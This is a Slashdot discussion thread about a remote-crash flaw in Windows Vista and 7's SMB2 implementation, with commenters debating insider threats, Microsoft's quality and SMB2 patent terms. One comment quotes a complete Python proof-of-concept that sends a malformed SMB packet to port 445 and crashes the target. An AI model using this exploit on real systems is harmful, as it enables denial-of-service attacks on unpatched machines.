Submitting a review for consideration is easy; please first read Slashdot's book review guidelines. Updated: 2008114 by samzenpus
All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2009 Geeknet, Inc.
Local? (Score:5, Interesting)
If it relies on a SMB2 request it is most likely restricted form request inside the LAN.
Either way, still bad.
Re:Local? (Score:4, Interesting)
Crashing clients is bad, any client on the LAN being able to take down the fileserver is substantially worse.
Parent
Re:Local? (Score:5, Interesting)
Parent
"RE"-introducing? (Score:5, Interesting)
The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.
Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have twist and stretch like taffy to make the case"?
It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.
Parent
Re:"RE"-introducing? (Score:5, Funny)
Parent
Re:"RE"-introducing? (Score:5, Insightful)
So you mean the problem is _less serious_ by the fact that it's been on _more_ Windows versions than stated? Maybe you mean that MS has said 'it's not a problem because this and that?'
Parent
Idiot (Score:4, Informative)
Parent
Re:"RE"-introducing? (Score:5, Insightful)
You make it sound like a gaping security hole is alright just because it's been in the product long enough that people might have forgotten about it.
If anything, this makes it sound like Windows 7 is the same old crap and that once again we have empty promises from Microsoft claiming that they will do things right this time.
Windows users are like domestic abuse victims.
Parent
Re:"RE"-introducing? (Score:5, Funny)
Parent
Re:Local? (Score:4, Funny)
Of course, the proper remedy for this (given that it is on a LAN) is to get up, walk down the hall, and beat the crap out of the douche-bag who's DoSing you. Really, the only reason DoS attacks work so well on the Internet is that the guys doing it are probably half-way around the world.
Parent
Re:Local? (Score:5, Informative)
Parent
Re: (Score:3, Insightful)
Re: (Score:3, Insightful)
Re:Local? (Score:5, Interesting)
Parent
Re: (Score:3, Funny)
Digital cameras make for plenty of things worth finding.
Re: (Score:3, Insightful)
...generally speaking you're not expecting attacks from inside your LAN...
Even if you have total control over all physical access points to your LAN, and total trust in your user base, there is still a chance that internal people can try to do nasty things - and in some ways they may have more motivation to do so.
I think the concept of "internal/trusted network" is going to shrink - nowadays I tend to this of the "internal network" as ending at the edge of centralised server resources, and clients on what would have been called the "internal LAN" are actually outside of wha
Re:Local? (Score:4, Interesting)
Second that big time.
The belief that a cloud of several thousand clients can ever be held secure is almost obscene. IT departments that concentrate most heavily on defending the outer border of their network, placing more than only a slight hint of trust in their "owned" client hardware are hopefully becoming rare.
Several thousand notebooks, travelling along the employees all around the world, through a hundred massive wifi-zones, hotel LANs, airports etc., should not be trusted higher than the machine Joe Random Employee brought from home. The official corporate notebook may have all the branding, settings, applications and whatnot, but that can at best make it a decently hardened PC, not bullet proof.
Many organisations really concentrate on the border, falling to the illusion of control: "we control the machine, the user / employee has no admin rights so all machines that go along on a business trip come back in perfect shape and without ever acquiring a drive-by rootkit somwhere"
In reality, most breaches are done, or facilitated, or unknowingly supported by people inside the organisation. Disgruntled employees are surely the worst enemy - and guaranteed to be numerous in any multinational company under the current economy. But it can also be frequent-fliers, hard-working staff that take their laptops everywhere and try to work all the time, connecting to a hundred different wifi-APs per year. Trusting a machine means physical control over everything. Trusting machines that commute and travel daily along with their employees is batshit crazy - but most IT departments still pretend they don't see that.
Parent
Re: (Score:3, Interesting)
Trust in computer disciplines doesn't have anything to do with something being trustworthy. Trust is an expression that you have left yourself vulnerable, and are trusting that you won't be exploited. How you feel about leaving yourself vulnerable is irrelevant. The probability that you will be exploited is also irrelevant.
That's what Trusted Computing is all about... it's not that your computer is more secure... it's that your computer is less secure, and you are trusting third parties not to screw you
Re:Local? (Score:5, Funny)
NOBODY EXPECT ATTACKS FROM INSIDE YOUR LAN!!!! Their chief weapon is surprise...surprise and fear...fear and surprise.... Their two weapons are fear and surprise...and ruthless efficiency.... Their *three* weapons are fear, surprise, and ruthless efficiency...and an almost fanatical devotion to rms.... Their *four*...no... *Amongst* their weapons.... Amongst their weaponry...are such elements as fear, surprise.... I'll come in again.
Parent
Re: (Score:3, Interesting)
Really? That may be true in small(ish) companies, say less than 50 employees. In general, many security experts beg to differ [usfst.com], however.
Some select quotes:
"In 92 percent of the incidents [re. inside attacks] investigated, revenge was the primary motivator."
Common attacks:
Re:Local? (Score:4, Insightful)
Parent
Re:Local? (Score:5, Funny)
well, now I know how to win any lan party contests :)
Parent
The difference is... (Score:3, Interesting)
...half the world is behind a NAT setup now, and the other half has Windows firewall enabled. Windows update exists now so people will be able to patch quickly and easily when a patch arrives.
Realistically this isn't going to effect many people like the old exploit did.
Still, it's quite comical, maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices, there's really no excuse for them not picking this one up before release.
Re:The difference is... (Score:5, Insightful)
Rewritten software is a double-edged sword. On the one hand you are able to finally discard the truly broken sections of your previous implementation; allowing you to make massive leaps forward. On the other you're getting rid of a large list of known bugs and replacing it with an even larger list of unknown ones.
One of the most useful features of old technolgy is that it breaks in predictable ways.
So it's not too surprising that something like this happened. Doesn't worry me either, I have firewalls and a NAT on all my machines, no reason not to. However since it's something that happened before, it's irritating that Microsoft didn't think to check for something like this.
Parent
Re:The difference is... (Score:5, Insightful)
really - unless the person sets the "Let Microsoft decide when and where I do updates" most of the updates WILL NOT be done. The average person uses the computer like a tv - turn it on to see the web and turn it off when done. Leave my computer on ALL NIGHT just so i can backup/run antivirus/run defrag/run etc. etc. ???
Oh yeah these people do exist and they have 'FRIENDS' that 'KNOW' computers and 'HELP' them out by turning off that annoying UAC or giving them a 'FREE' version of office. The looks on their faces when I explain that the software they got off Limewire is infected with virus' - they can't believe microsoft would do that!!! THAT is the mentality, and that is why these attacks have always worked, and will always work.
Parent
Not a problem. (Score:4, Funny)
It's incredibly unlikely to ever affect anyo
I knew Windows 7 was too good to be true (Score:5, Funny)
- Shiny-new interface.
- No annoying "are you sure" popups every 30 seconds like Vista.
- Can run on a 1 gigabyte machine without slowing to a crawl.
It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.
Not consistent (Score:5, Interesting)
Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".
Re:Not consistent (Score:5, Funny)
Having actually tried this on three windows 7 machines now, ...
You must be popular with your coworkers.
Parent
Re:Not consistent (Score:5, Informative)
Parent
Re:Not consistent (Score:4, Interesting)
Parent
Correction! (Score:5, Informative)
I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.
And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.
Re:Correction! (Score:4, Informative)
Parent
Ahh, nice to see ... (Score:5, Funny)
Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "
Yes, because we been done had seen that explot in the pasts.
Dear $DEITY, are there no proof readers or editors alive on these sites?
I'll be suprised if this affects anyone. (Score:4, Interesting)
Please grow up, you're driving us away (Score:5, Insightful)
Hi. I'm an adult. I work as a software engineer.
I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.
I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.
If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.
1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.
2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.
3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.
4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.
Re:Please grow up, you're driving us away (Score:5, Insightful)
The pubertal masses of Slashdot != The Linux community
Parent
Re: (Score:3, Insightful)
You're in the wrong place. You won't find a high percentage of adult, intelligent people here, and those that are are not very vocal. Maybe a long, long time ago, but no more. As someone else already said Slashdot != Linux Community.
Re:Please grow up, you're driving us away (Score:4, Informative)
Parent
Re:Please grow up, you're driving us away (Score:5, Informative)
I'm sorry, Sir. This is not the Linux community, this is the Slashdot community.
If you want the Linux community, go to http://www.kernel.org/ [kernel.org]
If you look on kernel.org, there is none of this garbage. You are mistaken.
Parent
For all who want a more technical summary of TFA: (Score:5, Informative)
The exploit (which is actually ridiculously simple) goes as follows:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -->
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Current problem solution: disable the SMB protocol on your infrastructure..
Now please excuse me, I have go and play a bit with our network admin..
Re:Big wow (Score:5, Funny)
Yeah, we read the first three lines of the Wikipedia link, too.
Parent
Re: (Score:3, Funny)
No we didn't. Shut up.
IP Reasons for SMB2 (Score:5, Interesting)
they don't like introducing "new" things
A slight correction, they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect but according to Wikipedia [wikipedia.org]:
SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html [ubiqx.org] for historical detail).
The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).
So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.
While SAMBA 4.0 has experimental support for SMB2 interfacing [samba.org], I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.
Parent
Re: (Score:3, Informative)
No, it won't. The specs are right here [microsoft.com].
Re: (Score:3, Informative)
Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promis nor the Community Promise (both linked) cover SMB2.
Re:IP Reasons for SMB2 (Score:5, Informative)
No, it won't. The specs are right here [microsoft.com].
"No, it won't" what? Possibly spell problems for the Samba team? From your link:
Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com]) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com]). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...
Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?
Why do they use the ambiguous language quoted above if this is an open technology I'm not suppose to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org]? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock in?) but I'm not about to give them the benefit of the doubt.
Parent
Re: (Score:3, Informative)
Re:First Post (Score:5, Funny)
Let me Loony Tunes that up for you:
Wabbit Season!
Duck Season!
Wabbit Season!
Duck Season!
Parent
Re: (Score:3, Funny)
Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.
When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.